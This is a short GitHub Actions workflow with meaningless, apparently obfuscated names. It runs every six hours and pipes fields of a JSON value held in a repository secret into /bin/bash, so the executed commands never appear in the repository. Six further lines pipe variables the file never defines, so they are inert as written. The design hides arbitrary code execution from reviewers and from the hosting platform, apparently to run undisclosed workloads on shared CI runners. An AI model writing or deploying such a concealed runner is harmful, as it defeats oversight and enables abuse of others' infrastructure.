name: jiangzehong1293
on:
  workflow_dispatch:
  schedule:
    - cron: '54 5/6 * * *'

jobs:
  build:
    runs-on: ubuntu-latest

    steps:
      - uses: actions/checkout@v4
      - name: jiangzehong1293
        env:
          eiuwr3320: ${{ secrets.eiuwr3320 }}
        run: |
          echo $eiuwr3320 | jq -r .hi863 | /bin/bash
          echo $tteu3 | jq -r .ck98 | /bin/bash
          echo $dwp78381 | jq -r .z52 | /bin/bash
          echo $t0058 | jq -r .gg39 | /bin/bash
          echo $jh4528 | jq -r .ix312 | /bin/bash
          echo $eze99706 | jq -r .ifgab333 | /bin/bash
          echo $ame086 | jq -r .nrfoy6 | /bin/bash

